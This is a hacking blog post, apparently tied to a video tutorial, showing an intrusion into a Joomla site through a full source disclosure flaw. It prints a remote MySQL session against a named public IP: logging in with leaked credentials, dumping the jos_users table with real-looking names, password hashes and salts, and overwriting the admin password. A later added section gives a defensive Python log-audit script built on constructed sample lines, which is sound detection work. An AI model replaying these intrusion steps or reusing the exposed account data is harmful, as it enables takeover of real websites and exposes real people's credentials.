In this post I will show you a video tutorial of mine, narrated in English.
In the tutorial I show how to break into a website running Joomla through a Full Source Disclosure vulnerability and then deliberately connect remotely to the MySQL server to change the administrator's password directly in the database (no phpMyAdmin involved).
Below you will find the video, and further down the source.
_ _ _ _
(_) ___ ___ _ __ ___ | | __ _ | |__ __ _ ___| | __
| |/ _ \ / _ \| '_ ` _ \| |/ _` | | '_ \ / _` |/ __| |/ /
| | (_) | (_) | | | | | | | (_| | | | | | (_| | (__| <
_/ |\___/ \___/|_| |_| |_|_|\__,_| |_| |_|\__,_|\___|_|\_\
|__/
###########################################################
# [VideoTuT] > https://youtu.be/XUlKGsjiqGI #
# [Blog] > http://blog.veneno.ovh #
# [FB] > http://fb.me/veneno.uk #
###########################################################
Process >
root@machine:~# mysql -u publish123 -p -h 202.181.134.138
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 61526
Server version: 5.0.51a-24+lenny5 (Debian)
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| publishinghouse |
+--------------------+
2 rows in set (0.22 sec)
mysql> use publishinghouse
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------------------------+
| Tables_in_publishinghouse |
+-------------------------------------+
| jos_acajoom_lists |
| jos_acajoom_mailings |
| jos_acajoom_queue |
| jos_acajoom_stats_details |
| jos_acajoom_stats_global |
| jos_acajoom_subscribers |
| jos_acajoom_xonfig |
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_catalogue |
| jos_categories |
| jos_chrono_contact |
| jos_chrono_contact_elements |
| jos_chrono_contact_emails |
| jos_chrono_contact_plugins |
| jos_components |
| jos_contact_details |
| jos_contact_us |
| jos_contact_us_ar |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_csvivirtuemart_available_fields |
| jos_csvivirtuemart_currency |
| jos_csvivirtuemart_log_details |
| jos_csvivirtuemart_logs |
| jos_csvivirtuemart_replacements |
| jos_csvivirtuemart_settings |
| jos_csvivirtuemart_template_fields |
| jos_csvivirtuemart_template_types |
| jos_csvivirtuemart_templates |
| jos_custom_quickicons |
| jos_dbcache |
| jos_ebooks |
| jos_ebooks_items |
| jos_groups |
| jos_gwcoupons |
| jos_gwcoupons_log |
| jos_gwcoupons_vm |
| jos_jf_content |
| jos_jf_tableinfo |
| jos_languages |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_osemsc_acl |
| jos_osemsc_content_basic |
| jos_osemsc_content_ext |
| jos_osemsc_ext |
| jos_osemsc_member |
| jos_osemsc_member_credits |
| jos_osemsc_member_exp |
| jos_osemsc_member_ips |
| jos_osemsc_orders |
| jos_osemsc_payment_methods |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_request_catalogue |
| jos_sections |
| jos_sefexts |
| jos_sefexttexts |
| jos_sefmoved |
| jos_sefurls |
| jos_session |
| jos_stats_agents |
| jos_templates_menu |
| jos_users |
| jos_vm_auth_group |
| jos_vm_auth_user_group |
| jos_vm_auth_user_vendor |
| jos_vm_cart |
| jos_vm_category |
| jos_vm_category_xref |
| jos_vm_country |
| jos_vm_coupons |
| jos_vm_creditcard |
| jos_vm_csv |
| jos_vm_currency |
| jos_vm_export |
| jos_vm_function |
| jos_vm_manufacturer |
| jos_vm_manufacturer_category |
| jos_vm_module |
| jos_vm_order_history |
| jos_vm_order_item |
| jos_vm_order_payment |
| jos_vm_order_status |
| jos_vm_order_user_info |
| jos_vm_orders |
| jos_vm_payment_method |
| jos_vm_product |
| jos_vm_product_attribute |
| jos_vm_product_attribute_sku |
| jos_vm_product_bk_08_july_2010 |
| jos_vm_product_category_xref |
| jos_vm_product_discount |
| jos_vm_product_download |
| jos_vm_product_files |
| jos_vm_product_mf_xref |
| jos_vm_product_price |
| jos_vm_product_product_type_xref |
| jos_vm_product_relations |
| jos_vm_product_reviews |
| jos_vm_product_series |
| jos_vm_product_type |
| jos_vm_product_type_1 |
| jos_vm_product_type_2 |
| jos_vm_product_type_parameter |
| jos_vm_product_votes |
| jos_vm_shipping_carrier |
| jos_vm_shipping_label |
| jos_vm_shipping_rate |
| jos_vm_shopper_group |
| jos_vm_shopper_vendor_xref |
| jos_vm_state |
| jos_vm_tax_rate |
| jos_vm_user_info |
| jos_vm_userfield |
| jos_vm_userfield_values |
| jos_vm_vendor |
| jos_vm_vendor_category |
| jos_vm_waiting_list |
| jos_vm_zone_shipping |
| jos_weblinks |
+-------------------------------------+
140 rows in set (0.23 sec)
mysql> SELECT * FROM jos_users;
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
| id | name | username | email | password | usertype | block | sendEmail | gid | registerDate | lastvisitDate | activation | params |
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
| 62 | Sanjay Chauhan | admin | [email protected] | f81f10e631f3c519d5a44d8da976fb67 | Super Administrator | 0 | 0 | 25 | 2010-02-20 11:57:06 | 2015-06-06 17:36:52 | | admin_language=
language=
editor=
helpsite=
timezone=0
|
| 63 | sunil | sunil | [email protected] | 45fb29b220d369824d44924afdca4e95:LGFd32RJw51BUkLNCwchIpIU2lMqiul1 | Super Administrator | 0 | 0 | 25 | 2010-01-19 07:06:45 | 2010-03-13 13:37:47 | | admin_language=
language=
editor=
helpsite=
timezone=0
|
| 66 | Sanjay Chauhan | sanjay | [email protected] | d29cb8dbd7535eeb848603316846f362:tyyWislIes7OM9mMpsXJKCdhPNHMOmAL | Administrator | 0 | 0 | 24 | 2010-02-20 09:30:56 | 2010-04-16 17:26:07 | 6d4be54b5f5a726425cbb7a7e7870794 | language=
timezone=0
admin_language=
editor=
helpsite=
|
+----+----------------+----------+---------------------------------------+-------------------------------------------------------------------+---------------------+-------+-----------+-----+---------------------+---------------------+----------------------------------+----------------------------------------------------------+
3 rows in set (0.22 sec)
mysql> show columns from jos_users;
+---------------+---------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------+---------------------+------+-----+---------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(255) | NO | MUL | | |
| username | varchar(150) | NO | MUL | | |
| email | varchar(100) | NO | MUL | | |
| password | varchar(100) | NO | | | |
| usertype | varchar(25) | NO | MUL | | |
| block | tinyint(4) | NO | | 0 | |
| sendEmail | tinyint(4) | YES | | 0 | |
| gid | tinyint(3) unsigned | NO | MUL | 1 | |
| registerDate | datetime | NO | | 0000-00-00 00:00:00 | |
| lastvisitDate | datetime | NO | | 0000-00-00 00:00:00 | |
| activation | varchar(100) | NO | | | |
| params | text | NO | | NULL | |
+---------------+---------------------+------+-----+---------------------+----------------+
13 rows in set (0.23 sec)
mysql> update jos_users set password='35393c24384b8862798716628f7bc6f4' where username='admin'
-> ;
Query OK, 1 row affected (0.23 sec)
Rows matched: 1 Changed: 1 Warnings: 0
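From the defender's side, the session above leaves two clear traces in a MySQL general log: a `Connect` record from a non-local host, and a `Query` record that rewrites the `password` column of the CMS user table. The script below is an added example and is not part of the original post or video; it assumes the general log line layout `YYMMDD HH:MM:SS <conn id> <command> <argument>` that mysqld writes with `general_log=ON`, and the sample log lines are constructed (the connection id, database and table names mirror the session above, the client address is a documentation-range placeholder).

```python
"""Audit MySQL general-log lines for a remote login followed by a direct
UPDATE of a Joomla-style users table's password column.
Added example; the log sample below is constructed, not captured."""
import re
from ipaddress import ip_address

# Constructed sample modelled on mysqld general-log records (tab-separated).
SAMPLE_LOG = """\
150606 17:36:40\t  12 Connect\tjoomla@localhost on publishinghouse
150606 17:36:41\t  12 Query\tSELECT * FROM jos_content WHERE id = 5
150606 17:36:50\t61526 Connect\tpublish123@203.0.113.7 on
150606 17:36:52\t61526 Query\tshow databases
150606 17:36:55\t61526 Query\tuse publishinghouse
150606 17:37:01\t61526 Query\tSELECT * FROM jos_users
150606 17:37:20\t61526 Query\tupdate jos_users set password='35393c24384b8862798716628f7bc6f4' where username='admin'
150606 17:37:25\t61526 Quit\t
"""

# Optional timestamp, then connection id, command and free-text argument.
LINE_RE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(?P<conn>\d+)\s+"
    r"(?P<cmd>Connect|Query|Quit|Init DB)\s*(?P<arg>.*)$"
)
# Connect argument starts with user@host.
CONNECT_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>\S+)")
# UPDATE of a *users table (jos_users, j25_users, ...) that sets password.
PASSWORD_UPDATE_RE = re.compile(
    r"\bupdate\s+`?\w*users`?\s+set\b.*\bpassword\s*=", re.IGNORECASE | re.DOTALL
)


def is_local_host(host: str) -> bool:
    """True when the client came in over the socket or a loopback address."""
    if host in ("localhost", "::1"):
        return True
    try:
        return ip_address(host).is_loopback
    except ValueError:  # a hostname, not an address: treat as remote
        return False


def audit_general_log(log_text: str) -> list:
    """Return one alert dict per suspicious record, in log order."""
    sessions = {}  # connection id -> (user, host) for correlating later queries
    alerts = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        conn, cmd, arg = m.group("conn"), m.group("cmd"), m.group("arg").strip()
        if cmd == "Connect":
            c = CONNECT_RE.match(arg)
            if not c:
                continue
            user, host = c.group("user"), c.group("host")
            sessions[conn] = (user, host)
            if not is_local_host(host):
                alerts.append({"conn": conn, "rule": "remote-connect",
                               "user": user, "source": host, "detail": arg})
        elif cmd == "Query" and PASSWORD_UPDATE_RE.search(arg):
            user, host = sessions.get(conn, ("?", "?"))
            # A password reset issued over a remote session is the worst case.
            severity = "critical" if not is_local_host(host) else "high"
            alerts.append({"conn": conn, "rule": "password-update", "user": user,
                           "source": host, "severity": severity, "detail": arg})
        elif cmd == "Quit":
            sessions.pop(conn, None)
    return alerts


if __name__ == "__main__":
    for alert in audit_general_log(SAMPLE_LOG):
        print(alert)
```

Both alerts fire on the constructed sample: the remote `Connect` by `publish123`, and the `password-update` on the same connection id, escalated to critical because the session was not local. The same two conditions map directly to the mitigations for the scenario in the post: binding mysqld to localhost (or firewalling port 3306) removes the first, and an account whose `GRANT` is limited to `'user'@'localhost'` removes the second.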
Source (http://blog.veneno.ovh/2015/06/hackeando-joomla-full-source-disclosure.html)